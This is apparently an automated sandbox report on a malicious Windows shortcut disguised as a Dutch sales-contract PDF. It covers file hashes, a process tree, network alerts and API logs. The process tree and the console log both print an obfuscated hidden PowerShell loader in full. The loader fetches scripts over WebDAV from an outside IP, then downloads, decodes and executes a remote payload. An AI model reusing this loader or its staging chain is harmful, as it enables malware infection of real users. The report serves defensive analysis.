Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 28, 2025, 9:35 a.m.	March 28, 2025, 9:37 a.m.

Size	2.5KB
Type	MS Windows shortcut, Points to a file or directory, Has Working directory, Icon number=11, Archive, ctime=Tue Mar 25 07:34:38 2025, mtime=Tue Mar 25 07:34:40 2025, atime=Tue Mar 25 07:34:40 2025, length=3143, window=hide
MD5	`3bf01e91b90ca74b97bd244636d69ce5`
SHA256	`70e2d6287ccd9e78e4688e23755ba1132bd342399f0f3d79daa9988bd4518b7a`
CRC32	`51FA211A`
ssdeep	`24:8lvFjVddSBmEXuHYenvE583yUCj+7SBvMzgeNB3N/LVXsyiqDB3:8lvjdQBlXuH/vgU7Q2rnd`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "MawDRIycyfS" "C:\Users\test22\AppData\Local\Temp\Verkoopcontract Data Markus.pdf.lnk"
3020
- wscript.exe "C:\Windows\System32\WScript.exe" "\\196.251.90.185@36123\Doku\Open - Verkoopcontract Data Markus.js"
  2448
  - cmd.exe "C:\Windows\System32\cmd.exe" /c\\196.251.90.185@36123\Doku\Glaserende.cmd
    2472
    - powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Bloddonationntolerancerne='func';Get-History;$Bloddonationntolerancerne+='t';Get-History;$Bloddonationntolerancerne+='i';$Overscepticalness=Get-History;$Bloddonationntolerancerne+='on:';(ni -p $Bloddonationntolerancerne -n Valence -value { param($Analysable);$Bloddonation=2;do {$Advarselsmeddelelsen+=$Analysable[$Bloddonation];$Bloddonation+=3} until(!$Analysable[$Bloddonation])$Advarselsmeddelelsen});ConvertTo-Html;(ni -p $Bloddonationntolerancerne -n Rosmus103 -value {param($Ditikerne);.($Reffed21) ($Ditikerne)});ConvertTo-Html;$Programadministrationen=Valence 'Fon TEWet r.P.W';$Programadministrationen+=Valence 'kreA BHac ol oI tEW.N at';$lamplighter=Valence 'CoM po ez oiV lTrlA aDa/';$Unpompously=Valence 'amTDal s j1 a2';$Ggen='Kl[FaNAfeViTSp.,asamEByRBrvSviBec e Wp OGlISknAlTUnMMoa MNEpaToG E BRF,]Ca:S :Ins ,ePrCL UFir I KtReY hp rP.oPrT FOTeC Fo iLAu=Se$ReU Ln.lp RO.eMRhpO OS.U Ks .l nY';$lamplighter+=Valence 'An5 m.Ap0Go l(UlW Ei.kn dSoo RwTis P NA,Tf My1 r0Pr. x0Co;a PrW SiGanS 6El4Pu; j R x 6 l4 M;Di f,r ovS :K 1,n3 4Ri.Ch0Sk) S JuG GeFycSkkHoo r/ 2,l0Kr1Ph0 .0Sa1 a0Ov1P EtF .iTrrSee .fInoGexTi/Jo1 3,o4kr.Hi0';$Sorels=Valence 'FeU .StiES.RH -daaFeGTrEDeNUnT';$alters=Valence ' KhTetTet ppHysPi:ab/ a/ PwBrwUdwJ,.Rea .eb n BnOvaHua MrUntBe.A.d Se B/C w pUn- .iSkn cSalBouBadBaeJesMa/QuiSkm Fa AgR e Us /HjcPrr yMesPot ,aB l N/UdHsya egMug Va i H.tidRus rp';$Synthesizations=Valence 'fo>';$Reffed21=Valence 'Ali,peStX';$Speal='unincarnate';$Unvariation='\Serbiskes.Ali';Rosmus103 (Valence 'Bl$R.G .LEko LbE.aPrl A:.aAC funDtjAD NRisFen iI.uN.nG DSPr=Te$DyE an bV ,:OuAB PDepurdGeAA.t NASa+Sl$Pau onA v.nASmR IS ASyTU I,ooRen');Rosmus103 (Valence 'Ks$ igM lLnOFlBUnaSvLFi:FrGKoAPaSUntA rPso ppF,L ,aHysBetReySe=H $ViaSalXiTAaeUnrEnsSi.FeSElp olM IPrtB ( F$ RsAdYF,NSmT DH He MSPoiWiZUbATutS,I AoFoND SHa)');Rosmus103 (Valence $Ggen);$alters=$Gastroplasty[0];$Ascomycetal=(Valence 'Ca$K gCaLvrOMobudaBeL S:Frf iOUnrB.A Fn LSHuTC,A,el,pt.peTe=CaN ,ePuW.e-P oG.b RJRheSmcToT T Sks YU S.at fe umFo.De$ViPNoR GOAsGS RGua lm.hASkd rm aiC.n iAfS aTR r .a.rtBaI,ooT Nb,ePiN');Rosmus103 ($Ascomycetal);Rosmus103 (Valence ' B$AfFAdosorReaA.n jsA t oaD lMitbie S. KHs.eMaa.idste rP sIn[br$VeSSaoMerReeA l ,s,u]M =Yn$oplDaaBrm.op,elFaiNogMahT,tRee r');$Espressoers=Valence 'Af$ IF .oQur Sa nUnsBetF,aP,lB tN,e a.ChDM o KwSrnB l ao aChdTeF OiTml teP (In$HmaNelAntUneTir.isBo,.o$ sTrohE rduuGrsRot ,f uSpl en TeUnsUnsRu)';$Thrustfulness=$Afdansnings;Rosmus103 (Valence 'S.$RegL.lBrO,oB HAv LUd: Fa .m PA pTKrrKoe RS n.eEP =B (Alt.reNis Kto -GaP ,a.hT H . In$ ,T.ehStRs,UFosS t ufBeUFolsiN.lE ,s sko)');while (!$Amatrerne) {Rosmus103 (Valence 'Bi$ ,gMol yoSkb.ea nlFo:AnAMibTroJerJutE hProR,l,rd anVeiStnRigJe=Ky$N AAkn.ntAriRepSkrH i Se Os,at') ;Rosmus103 $Espressoers;Rosmus103 (Valence ' M[ oT UH aR e FA eDMeiThN Rg r. TNeh Gr.re JADiD p] r: ,: ks.alReEIneP,pA ( ,4P.0Ud0Kl0Ov)');Rosmus103 (Valence 'C $ ,GC l Ho ObT AS,lWo:FrAVomSeapot oRBiE eR nT e o= a( DT eIdS UtK - .PNoAraT Hko P$ HtBrH mrFoU GS .T BfRaU kLS NC ECasT se )') ;Rosmus103 (Valence ' o$ NGDeLM oA,BShAonL : oRP ASmnS dJeMFlO rAcn ReUnrI,NTee U= M$ SGQulRao ,B aShL e:C,NBuOOrNSadFlE N uA m .EAaRA,a abTil,aE c+Bo+F %Gl$ gTeA.asMaTH.RTrOLapTtlKoa ls tI YFr. tc eoS U OnFrt') ;$alters=$Gastroplasty[$randmornerne]}$Operationsbeskrivelsers=441444;$Bjergomraader=29090;Rosmus103 (Valence 'Wh$tiGVal eoUfb rASpLFo:.oCDiaP RTrG .aPl Ok= G PGImEfotUn- CMeomiNWaT SeGaNA T B D $ eT ,HA r kU nsRhtp.F Iu OLB ND.EDiSOvs');Rosmus103 (Valence 'Fi$GugNol noChbM,a TlSm: PCG oHontotSyu imF.a xIm2,v3B 3 o Fa= P m[BiS oySus Bt ee.amBu. SCFeoFun evUne srF.tCl]Hj: t:HeF WrKroSnmF B aa osBre 6Ph4SuSNat,pr i nSugSa( D$TaCL aTirTigstaFi)');Rosmus103 (Valence 'K.$H,GHalM.o TbDraHel V: BoAfr ne . =Br Ma[ArsFeYBuSC tFieBrM,r.TrT oEB x VT ,.T,E Sn ,cS,o tD ,i NFrgF,]Em: :Ska,nSDiCB.iSeIAn.NeG.re FT aSnaTG RUni YN SgCo(P,$EfcSooS.NPyTGeUSrMCaAClXfa2 3Bi3So)');Rosmus103 (Valence 'Un$ NGU.LKeoSnBChAUnlFl: eL oInVOrlUnyCydA I SGAuTBy=,e$L oKaRFoER.. Ss NUU b nS Pt Gr I rnTaGKi( B$ oo pGuespRIraChTCoi OCoN PSbeB,ee US MKKiR,si rV NeStLSus.lEKoRDes H,Wa$AnB RJCreTaR .G UO RM.nrSta ,a.ed AeUnRPe)');Rosmus103 $Lovlydigt;"
      1680

Name	Response	Post-Analysis Lookup
www.aennaart.de	A 217.160.0.61	217.160.0.61

IP Address	Status	Action
164.124.101.2	Active	Moloch
196.251.90.185	Active	Moloch
217.160.0.61	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49181 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49175 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49174 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49187 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49192 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49179 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49196 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49195 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49180 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49198 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49197 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49201 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49207 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49202 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49200 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49208 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49204 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49203 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49206 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49209 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49177 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49182 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49185 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49194 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49199 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49178 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49183 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49190 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49191 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 196.251.90.185:36123 -> 192.168.56.102:49168	2049438	ET HUNTING Successful PROPFIND Response for Application Media Type	Misc activity
TCP 196.251.90.185:36123 -> 192.168.56.102:49168	2026989	ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1	Potentially Bad Traffic
TCP 192.168.56.102:49186 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49188 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49189 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49193 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49205 -> 217.160.0.61:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 28, 2025, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2025, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2025, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2025, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2025, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 28, 2025, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2025, 9:35 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2025, 9:35 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 28, 2025, 9:35 a.m.			0	0

Command line console output was observed (50 out of 341 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: /min powershell.exe -windowstyle hidden "Get-Service;$Bloddonationntolerancerne='func';Get-History;$Bloddonationntolerancerne+='t';Get-History;$Bloddonationntolerancerne+='i';$Overscepticalness=Get-History;$Bloddonationntolerancerne+='on:';(ni -p $Bloddonationntolerancerne -n Valence -value { param($Analysable);$Bloddonation=2;do {$Advarselsmeddelelsen+=$Analysable[$Bloddonation];$Bloddonation+=3} until(!$Analysable[$Bloddonation])$Advarselsmeddelelsen});ConvertTo-Html;(ni -p $Bloddonationntolerancerne -n Rosmus103 -value {param($Ditikerne);.($Reffed21) ($Ditikerne)});ConvertTo-Html;$Programadministrationen=Valence 'Fon TEWet r.P.W';$Programadministrationen+=Valence 'kreA BHac ol oI tEW.N at';$lamplighter=Valence 'CoM po ez oiV lTrlA aDa/';$Unpompously=Valence 'amTDal s j1 a2';$Ggen='Kl[FaNAfeViTSp.,asamEByRBrvSviBec e Wp OGlISknAlTUnMMoa MNEpaToG E BRF,]Ca:S :Ins ,ePrCL UFir I KtReY hp rP.oPrT FOTeC Fo iLAu=Se$ReU Ln.lp RO.eMRhpO OS.U Ks .l nY';$lamplighter+=Valence 'An5 m.Ap0Go l(UlW Ei.kn dSoo RwTis P NA,Tf My1 r0Pr. x0Co;a PrW SiGanS 6El4Pu; j R x 6 l4 M;Di f,r ovS :K 1,n3 4Ri.Ch0Sk) S JuG GeFycSkkHoo r/ 2,l0Kr1Ph0 .0Sa1 a0Ov1P EtF .iTrrSee .fInoGexTi/Jo1 3,o4kr.Hi0';$Sorels=Valence 'FeU .StiES.RH -daaFeGTrEDeNUnT';$alters=Valence ' KhTetTet ppHysPi:ab/ a/ PwBrwUdwJ,.Rea .eb n BnOvaHua MrUntBe.A.d Se B/C w pUn- .iSkn cSalBouBadBaeJesMa/QuiSkm Fa AgR e Us /HjcPrr yMesPot ,aB l N/UdHsya egMug Va i H.tidRus rp';$Synthesizations=Valence 'fo>';$Reffed21=Valence 'Ali,peStX';$Speal='unincarnate';$Unvariation='\Serbiskes.Ali';Rosmus103 (Valence 'Bl$R.G .LEko LbE.aPrl A:.aAC funDtjAD NRisFen iI.uN.nG DSPr=Te$DyE an bV ,:OuAB PDepurdGeAA.t NASa+Sl$Pau onA v.nASmR IS ASyTU I,ooRen');Rosmus103 (Valence 'Ks$ igM lLnOFlBUnaSvLFi:FrGKoAPaSUntA rPso ppF,L ,aHysBetReySe=H $ViaSalXiTAaeUnrEnsSi.FeSElp olM IPrtB ( F$ RsAdYF,NSmT DH He MSPoiWiZUbATutS,I AoFoND SHa)');Rosmus103 (Valence $Ggen);$alters=$Gastroplasty[0];$Ascomycetal=(Valence 'Ca$K gCaLvrOMobudaBeL S:Frf iOUnrB.A Fn LSHuTC,A,el,pt.peTe=CaN ,ePuW.e-P oG.b RJRheSmcToT T Sks YU S.at fe umFo.De$ViPNoR GOAsGS RGua lm.hASkd rm aiC.n iAfS aTR r .a.rtBaI,ooT Nb,ePiN');Rosmus103 ($Ascomycetal);Rosmus103 (Valence ' B$AfFAdosorReaA.n jsA t oaD lMitbie S. KHs.eMaa.idste rP sIn[br$VeSSaoMerReeA l ,s,u]M =Yn$oplDaaBrm.op,elFaiNogMahT,tRee r');$Espressoers=Valence 'Af$ IF .oQur Sa nUnsBetF,aP,lB tN,e a.ChDM o KwSrnB l ao aChdTeF OiTml teP (In$HmaNelAntUneTir.isBo,.o$ sTrohE rduuGrsRot ,f uSpl en TeUnsUnsRu)';$Thrustfulness=$Afdansnings;Rosmus103 (Valence 'S.$RegL.lBrO,oB HAv LUd: Fa .m PA pTKrrKoe RS n.eEP =B (Alt.reNis Kto -GaP ,a.hT H . In$ ,T.ehStRs,UFosS t ufBeUFolsiN.lE ,s sko)');while (!$Amatrerne) {Rosmus103 (Valence 'Bi$ ,gMol yoSkb.ea nlFo:AnAMibTroJerJutE hProR,l,rd anVeiStnRigJe=Ky$N AAkn.ntAriRepSkrH i Se Os,at') ;Rosmus103 $Espressoers;Rosmus103 (Valence ' M[ oT UH aR e FA eDMeiThN Rg r. TNeh Gr.re JADiD p] r: ,: ks.alReEIneP,pA ( ,4P.0Ud0Kl0Ov)');Rosmus103 (Valence 'C $ ,GC l Ho ObT AS,lWo:FrAVomSeapot oRBiE eR nT e o= a( DT eIdS UtK - .PNoAraT Hko P$ HtBrH mrFoU GS .T BfRaU kLS NC ECasT se )') ;Rosmus103 (Valence ' o$ NGDeLM oA,BShAonL : oRP ASmnS dJeMFlO rAcn ReUnrI,NTee U= M$ SGQulRao ,B aShL e:C,NBuOOrNSadFlE N uA m .EAaRA,a abTil,aE c+Bo+F %Gl$ gTeA.asMaTH.RTrOLapTtlKoa ls tI YFr. tc eoS U OnFrt') ;$alters=$Gastroplasty[$randmornerne]}$Operationsbeskrivelsers=441444;$Bjergomraader=29090;Rosmus103 (Valence 'Wh$tiGVal eoUfb rASpLFo:.oCDiaP RTrG .aPl Ok= G PGImEfotUn- CMeomiNWaT SeGaNA T B D $ eT ,HA r kU nsRhtp.F Iu OLB ND.EDiSOvs');Rosmus103 (Valence 'Fi$GugNol noChbM,a TlSm: PCG oHontotSyu imF.a xIm2,v3B 3 o Fa= P m[BiS oySus Bt ee.amBu. SCFeoFun evUne srF.tCl]Hj: t:HeF WrKroSnmF B aa osBre 6Ph4SuSNat,pr i nSugSa( D$TaCL aTirTigstaFi)');Rosmus103 (Valence 'K.$H,GHalM.o TbDraHel V: BoAfr ne . =Br Ma[ArsFeYBuSC tFieBrM,r.TrT oEB x VT ,.T,E Sn ,cS,o tD ,i NFrgF,]Em: :Ska,nSDiCB.iSeIAn.NeG.re FT aSnaTG RUni YN SgCo(P,$EfcSooS.NPyTGeUSrMCaAClXfa2 3Bi3So)');Rosmus103 (Valence 'Un$ NGU.LKeoSnBChAUnlFl: eL oInVOrlUnyCydA I SGAuTBy=,e$L oKaRFoER.. Ss NUU b nS Pt Gr I rnTaGKi( B$ oo pGuespRIraChTCoi OCoN PSbeB,ee US MKKiR,si rV NeStLSus.lEKoRDes H,Wa$AnB RJCreTaR .G UO RM.nrSta ,a.ed AeUnRPe)');Rosmus103 $Lovlydigt;" console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Status Name DisplayName console_handle: 0x0000001b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped AdobeARMservice Adobe Acrobat Update Service console_handle: 0x00000023	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped AdobeFlashPlaye... Adobe Flash Player Update Service console_handle: 0x00000027	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running AeLookupSvc Application Experience console_handle: 0x0000002b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped ALG Application Layer Gateway Service console_handle: 0x0000002f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped AppIDSvc Application Identity console_handle: 0x00000033	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped Appinfo Application Information console_handle: 0x00000037	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped AppMgmt Application Management console_handle: 0x0000003b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped aspnet_state ASP.NET State Service console_handle: 0x0000003f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running AudioEndpointBu... Windows Audio Endpoint Builder console_handle: 0x00000043	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running AudioSrv Windows Audio console_handle: 0x00000047	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped AxInstSV ActiveX Installer (AxInstSV) console_handle: 0x0000004b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped BDESVC BitLocker Drive Encryption Service console_handle: 0x0000004f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running BFE Base Filtering Engine console_handle: 0x00000053	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped BITS Background Intelligent Transfer Ser... console_handle: 0x00000057	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running Browser Computer Browser console_handle: 0x0000005b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped bthserv Bluetooth Support Service console_handle: 0x0000005f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped CertPropSvc Certificate Propagation console_handle: 0x00000063	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped clr_optimizatio... Microsoft .NET Framework NGEN v2.0.... console_handle: 0x00000067	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped clr_optimizatio... Microsoft .NET Framework NGEN v2.0.... console_handle: 0x0000006b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped clr_optimizatio... Microsoft .NET Framework NGEN v4.0.... console_handle: 0x0000006f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped clr_optimizatio... Microsoft .NET Framework NGEN v4.0.... console_handle: 0x00000073	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped COMSysApp COM+ System Application console_handle: 0x00000077	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped CrossEX Live Ch... CrossEX Live Checker console_handle: 0x0000007b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running CryptSvc Cryptographic Services console_handle: 0x0000007f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running CscService Offline Files console_handle: 0x00000083	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running DcomLaunch DCOM Server Process Launcher console_handle: 0x00000087	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped defragsvc Disk Defragmenter console_handle: 0x0000008b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running Dhcp DHCP Client console_handle: 0x0000008f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running Dnscache DNS Client console_handle: 0x00000093	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped dot3svc Wired AutoConfig console_handle: 0x00000097	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running DPS Diagnostic Policy Service console_handle: 0x0000009b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped EapHost Extensible Authentication Protocol console_handle: 0x0000009f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped EFS Encrypting File System (EFS) console_handle: 0x000000a3	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running eventlog Windows Event Log console_handle: 0x000000a7	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running EventSystem COM+ Event System console_handle: 0x000000ab	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped Fax Fax console_handle: 0x000000af	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped fdPHost Function Discovery Provider Host console_handle: 0x0000003b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running FDResPub Function Discovery Resource Publica... console_handle: 0x00000013	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped FontCache Windows Font Cache Service console_handle: 0x00000017	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped FontCache3.0.0.0 Windows Presentation Foundation Fon... console_handle: 0x0000001b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped GoogleChromeEle... Google Chrome Elevation Service (Go... console_handle: 0x00000023	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Running gpsvc Group Policy Client console_handle: 0x00000027	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped gupdate Google 업데이트 서비스 (gupdate) console_handle: 0x0000002b	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped gupdatem Google 업데이트 서비스 (gupdatem) console_handle: 0x0000002f	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped hidserv Human Interface Device Access console_handle: 0x00000033	1	1
WriteConsoleW March 28, 2025, 9:35 a.m.	buffer: Stopped hkmsvc Health Key and Certificate Management console_handle: 0x00000037	1	1

Uses Windows APIs to generate a cryptographic key (50 events)

Time & API	Arguments	Status	Return
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da408 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
